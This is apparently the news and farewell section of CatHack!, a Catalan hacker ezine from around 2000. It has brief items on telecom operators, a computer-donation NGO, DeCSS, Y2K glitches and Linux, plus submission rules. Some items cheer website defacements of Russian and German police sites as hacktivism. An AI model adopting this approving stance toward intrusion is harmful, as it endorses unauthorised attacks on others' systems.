FirstMark Communication
Banda 26
Telefonica :((
Broadnet
Airtel
Alo2000
Sky Point
AbraNet
Mill Telecom
<POPNOTE> Ara ens podran punxar les comunicacions sense necessitat
de parlar amb els administradors de les centraletes!!...Pero per
altre banda apareix un nou PHREAK </POPNOTE>
ONG: Ha sorgit una ong a barcelona (catalunya) no de mexic ;) que s'encarrega
d'escollir, classificar i muntar ordinadors per enviar-los al 3r
mon, si teniu qualsevol cosa que no vulgueu podeu trucar a:
93 322 15 80 i li porteu el material.
Encara que tambe existeix la possibilitat de portar aquest material
(qualsevol material informatic o d'audio (micros/taules de mescles,
etc...) les podeu portar a Radio Bronka (una radio lliure de bcn)
i alla amb molt de gust us la recolliran.
Radio Bronka:
web: www.pangea.org/rbronka
mail: rbronka@pangea.org
telf: 93 359 65 72
<popnote> Mes k nosaltres haurien de ser les empreses que son
capaces de tirar monitors de 20'' i pentiums pq ja no els necessiten
o nomes serveixen per subvencionar a traves de llistes i impostos
el seu negoci. MORT A L'ESPECULACIO! </popnote>
EuroTel la caga en el 2000:
La companyia de telefonia mobil de la Republica Checa, va enviar
als seus clients les factures de telefon (mantes) del gener de
1900!! Lo millor de tot es que ho van fer quan encara no havia
arribat el gener (en desembre).
ECSPANYA VA BIEN:
Nomes cal veure l'estadistica seguent:
8 de cada 100 habitants d'espanya tenen ordinador.
I ara volen invertir en Internet per enbobarnos amb la WWW(wikiwikiwa)
Resistencia Txetxena:
Un grup de hacking Txetxe hackeja la wib principal de Russia.
xD - Salut i Hacktivisme!
DVD petat:
Un xaval norueg de 15 anys ha conseguit petar el sistema de seguretat
que impedia la copia dels discos DVD, gracies a un petit programa
anomenat DeCSS copia els fitxers del dvd al disc dur.
Microsoft ataca frontalment a Linux:
Microsoft a decidit atacar directament a linux, el seu gran competidor
en el mon dels servidors, ja que es gratuit, i intenta menjar el coco
als admins amb la pagina:
www.microsoft.com/ntserver/nts/news/msnw/linuxmyths.asp
On diu que que es mentida que linux sigui més estable que NT...JAJAJA!
>linux rulez!
* Un jove de 15 anys passa les proves de novell per adults! Obtenint
aixi el titol d'ingenier Novell
*La ICANN (la organització de internet que assigna els noms i numeros)
ha decidit que podem registrar direccions realment llargues... per
exemple...
http://www.truitadepatatesambpollastresbullitsiunamicadeallioli.oi!
*Un telèfon basat en un 386 funciona amb linux
*El jefe financier de mocosoft, dimiteix!! pq sera? :) Linux Rlz..
Mobils que contesten a emails amb veu:
S'adaptarà l'MP3 a movicom.
FGP hackejada xDD:
La pàgina de la policia alemana va ser hackejada el 30 de decembre on
va possar propaganda per promoure la marihuana i un local sadomasoquista
sembla que a la policia no li va agradar la remodelació de la wib xDD
-foteu-vos! mort al feixisme!
SoftCatalà treu la versió 4.7 del Navegador (Netscape) en català.
Un ciutadà alemany va rebre 6 milions a la seva conta gràcies a l'efecte 2000.
JAJAJA!
ªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªª
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Manopla.Campistrula.Popeye.El.Poyista.Lacasaladamandra.Terretrete <--- fran xD
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
ªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªªª
[0B]
.---------------------------------------.
| Acomiadament |
| ______ ________ |
| | Okis | | Kancel | |
|_________________________________________|
Esperem que us hagi agradat i que us hagueu deixat la vista davant del monitor
per nosaltres, ara estareu morenos! (la radiació dels "rajos catòlics" del
monitor fa meravelles!) xD - Si voleu que vagi millorant la cosa, envieu
textes! distribuïu la revista! ensenyeu i apreneu!... -res més per avui
Recordeu: MERDA! ELS PESOLS ES MORIRAN! NO ELS HI HE DEIXAT MENJAR!
------------------------[ txt ]----------------------------------------------
Normes dels textes:
78 columnes: per poder-se llegir en l'edit
Standar ANSI: Per poder-se llegir els caracters especials desde win,
encara que es recomenable que millor si no fiqueu accents. El podeu
convertir amb el winhex (entre d'altres).
NO 0Ah ni TAB : 0Ah es el valor hexadecimal del return que utilitza el
linux i els usuaris de win els toca bastant els ... . I tampoc
utilitzeu el TAB, feu els espais amb l'espai, ja que molts
visualitzadors interpreten el TAB de formes diferents.
NOTA: Segurament farem algun programa en C que converteixi el texte
segons les normes aqui establertes, pero tenim poc temps per fer res,
si us aborriu i sabeu programar envieu el programa i el possarem a la
revista.
------------------------[ txt ]----------------------------------------------
CatHack! (f) - La distribució d'aquest ezine és totalment lliure, mentre no
es realitzi cap modificació en el seu contingut.